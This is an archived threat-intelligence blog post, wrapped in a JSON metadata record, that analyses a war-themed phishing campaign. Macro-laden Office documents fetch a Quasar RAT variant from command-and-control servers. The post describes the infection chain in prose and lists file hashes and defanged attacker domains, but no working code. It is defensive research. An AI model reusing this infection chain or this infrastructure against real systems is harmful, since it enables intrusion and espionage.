{
	"id": "04daae9c-29c7-4b5a-b0c0-89b9a32a5cbe",
	"created_at": "2026-04-06T00:13:55.830248Z",
	"updated_at": "2026-04-10T03:20:51.496406Z",
	"deleted_at": null,
	"sha1_hash": "9de160ea8e73fcdf71947bbb8882ab0191728f03",
	"title": "Another cyber espionage campaign in the Russia-Ukrainian ongoing cyber attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5795305,
	"plain_text": "Another cyber espionage campaign in the Russia-Ukrainian\r\nongoing cyber attacks\r\nPublished: 2022-03-24 · Archived: 2026-04-05 17:37:50 UTC\r\nFrom lab52, in connection to the latest events related to the Russia’s ongoing cyberattacks in Ukraine, beyond\r\ndestructive artifacts seen like Wipers and others, a new wave of malicious office documents (hereinafter maldocs)\r\nhas been observed attempting to compromise systems leveraging a variant of well-know and open-source malware\r\nknown as Quasar RAT.\r\nRecently, we identified a maldoc named “Ukraine Conflict Update 16_0.doc” with a creation time 2022-03-16 and\r\nwhose content appears to be retrieved directly from the Institute for the Study of War website. Due to the creation\r\ntime, the maldoc was generated with the latest information updated since the most recent information published by\r\nthis website is from March 23 (considering it at this point in time).\r\nThe latest content of the Institute for the Study of War website, aligned with the current time we are writing this\r\npost (2022-03-24), is shown below:\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 1 of 12\n\nBack to the maldoc analysis, it contains a VBA function that trigger the execution of a base64 encoded Windows\r\nPowerShell command:\r\nApplying de-obfuscating techniques, we finally rebuilt the PowerShell command and we found a HTTP GET\r\nrequest from a list of command-and-control servers with the main purpose of obtaining a Windows PE file from\r\nthe C2 and execute it as a new process of Powershell.exe (PE file obtained from the C2 will be saved into the\r\n%TEMP% path and will be renamed as sarewfdsdfh.exe).\r\nTake a look at the highlighted domains, they will be commented later on.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 2 of 12\n\nRelated to the C2 domains inside this sample, we have found an interesting list of other samples, with the same\r\nsubject matter that seems to be part of an ongoing campaing. One of them was a ZIP format compressed file\r\n(“Ukraine Conflict Update 16_0.zip”) containing both a “.xlsm” and a “.docm” MS Office documents with same\r\nnaming. From what we can assume the initial attack vector goes through a spear phishing email.\r\nBoth files have obfuscated VBA macros, which are responsible for building a script to deploy the infection chain\r\nwithout containing any encoded PowerShell command.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 3 of 12\n\nRebuilding the scripts by deobfuscating the VBA marcos has made it possible to trace what malicious actions are\r\ntaken to infect the victim machine. As we can see below, both documents perform all the same actions, sending a\r\nHTTP GET request to the C2 asking for a PE file named b29.exe.\r\nAfterwards, if the HTTP response from the command and control server (C2) was succeeded (response code =\r\n200), the Windows PE file will be stored into the %TEMP% directory and later executed by the WINWORD.EXE\r\nprocess.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 4 of 12\n\nRegarding network communication, the C2 is hosted on b29[.]bet, which resolves to an IP address\r\n(104.18.24[.]213) that belongs to Cloudflare.\r\nWith the next domain registrant information:\r\nSetting our sights on the recent \u0026 related artifacts downloaded from the C2, we identified, through the uri\r\nhxxp://b29[.]bet/SoftwareUpdate.exe, another related maldoc with an interesting topic:\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 5 of 12\n\nFrom the aforementioned URI we found a new malicious document contacting to the same C2. This maldoc is\r\nnamed “Leaked_Kremlin_emails_show_Minsk_protoco.doc” and its content is shown below:\r\nAnalyzing the information contained in the maldoc we found that it was a copy of a new published in the\r\nEuromaidan Press, Ukraine Internet-based newspaper. The report from the official source Euromaidan Press can\r\nbe read here . The analysis has revealed some similarities in the infection chain, due to the fact that it is formed by\r\nmalicious VBA macros and as described below, it uses the same C2 domain and it also uses an encoded\r\nPowerShell command.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 6 of 12\n\nThe maldoc, mainly, uses a base64 encoded Windows PowerShell command (as we saw in the first maldoc\r\nanalyzed) to perform the download from the C2 and then execute it through a WScript object.\r\nNetwork communications through the PowerShell command are made with the HTTP protocol, sending a HTTP\r\nGET request without using HTTP headers such as User-Agent nor Accept as seen in the previously maldocs.\r\nFurthermore, we saw the maldoc contacts with a C2 which domain is contained in the domain list extracted from\r\nthe first maldoc.\r\nWe also saw it on the online malware sandbox ANYRUN with the same network behavior.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 7 of 12\n\nWhat’s more, this maldoc contacts with the same domain list we found in the first maldoc requesting a Windows\r\nPE file named SoftwareUpdate.exe.\r\nSo far, we have seen that the most demanded Windows PE file by every maldoc analyzed was SoftwareUpdate.exe\r\nand depending on the requesting moment it could be distributed by the C2 or not. After getting this Windows PE\r\nfile from the C2 and starting to analyze it, based on a simple static analysis we could quickly conclude it was a\r\nvariant of well-know and open-source malware known as Quasar RAT developed in .NET framework.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 8 of 12\n\nQuasar RAT is a software distributed under the MIT (Massachusetts Institute of Technology) licensed and freely\r\navailable on GitHub, as you can see here:  \r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 9 of 12\n\nSubsequently, with a behavior-based approach debugging the sample, we realized this sample checks the current\r\npath on which it is executed and copy itself in a new directory named “PDF Reader” into the\r\n%PROGRAMFILES% directory. Then, the next step is hiding itself from disk setting its file attributes as hidden.\r\nFor this purpose, the sample modifies its own enumerate property FileAttributes setting it to Hidden\r\n(Application.ExecutablePath -\u003e FileAttributes.Hidden).\r\nThen, with a ready environment, Quasar tries to contact with the C2 notifying a new computer compromised\r\nsuccessfully. It was here, at this point of analysis, where we found the same domain list that it had been identified\r\npreviously through the maldocs analyzed. This C2 domain list is stored in a dynamic object variable named\r\nhostsManager, specifically into the attribute queue_0 and each value store every domain, IP address and port\r\nassociated to contact with the C2. Note that Quasar RAT communicates with the C2 using the same TCP port 4782\r\nand every communication will be encrypted through HTTPS except only one relative to the domain b29[.]bet.\r\nFinally, we found its SSL certificate, identifying the subject as a Quasar Server CA with an expiration date\r\n31/12/9999 and it appears that it have been generated since March 04, 2022.\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 10 of 12\n\nOn the whole, beyond destructive artifacts seen into the Russia’s ongoing cyberattacks in Ukraine, it seems there\r\nis a place for cyberespionage campaigns which are taking advantage of the information published relative to the\r\nRussia’s ongoing cyberwar events. However, we do not have enough evidence to make any kind of attribution up\r\nto now.\r\nINDICATORS OF COMPROMISE:\r\nMALDOCS:\r\nFILENAME SHA1\r\nUkraine Conflict Update 16_0.doc 6e7775277b18a481ca4ce24d5e13fd38ab1b5991\r\nUkraine Conflict Update 16_0.docm 079037f3abff65ce012af1c611f8135726ef0ad2\r\nUkraine Conflict Update 16_0.xlsm 35c6d3b40ba88f5da444083632c8e414a67db267\r\nUkraine Conflict Update 16_0.zip 296f26fb9b09a50f13bdf6389c05f88019bac13f\r\nLeaked_Kremlin_emails_show_Minsk_protoco.doc 4476657d32a55ca0d89d21d2a828a8d8cbc5dbab\r\nQUASAR RAT:\r\nFILENAME SHA1\r\nThe increasingly complicated\r\nRussia-Ukraine crisis\r\nexplained.zip\r\n34dfdf16d13f974a06f46486ab4ad7034db8e9d5\r\nThe increasingly complicated\r\nRussia-Ukraine crisis\r\nexplained.exe.pdf\r\nbbb9bf63efc448706f974050bef23bb1edd13782\r\nSoftwareUpdate.exe bbb9bf63efc448706f974050bef23bb1edd13782\r\nNETWORK:\r\nDomain list\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 11 of 12\n\ntaisunwin.]club\r\nweb.sunwinvn.]vip\r\nsunvn.]vin\r\nb29.]bet\r\nplay.go88vn.]vin\r\nplaygo88.]fun\r\nchoigo88.]us\r\ngo88c.]net\r\ngo88.]gold\r\ngo88vn.]vin\r\nplay.go88vn.]vin\r\ngo88code.]com\r\nthesieutoc.]net\r\nsun.]fun\r\nCustomers with Lab52’s APT intelligence private feed service already have more tools and means of detection for\r\nthis campaign.\r\nIn case of having threat hunting service or being client of S2Grupo CERT, this intelligence has already been\r\napplied.\r\nIf you need more information about Lab52’s private APT intelligence feed service, you can contact us through the\r\nfollowing link\r\nSource: https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nhttps://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/"
	],
	"report_names": [
		"another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434435,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9de160ea8e73fcdf71947bbb8882ab0191728f03.pdf",
		"text": "https://archive.orkl.eu/9de160ea8e73fcdf71947bbb8882ab0191728f03.txt",
		"img": "https://archive.orkl.eu/9de160ea8e73fcdf71947bbb8882ab0191728f03.jpg"
	}
}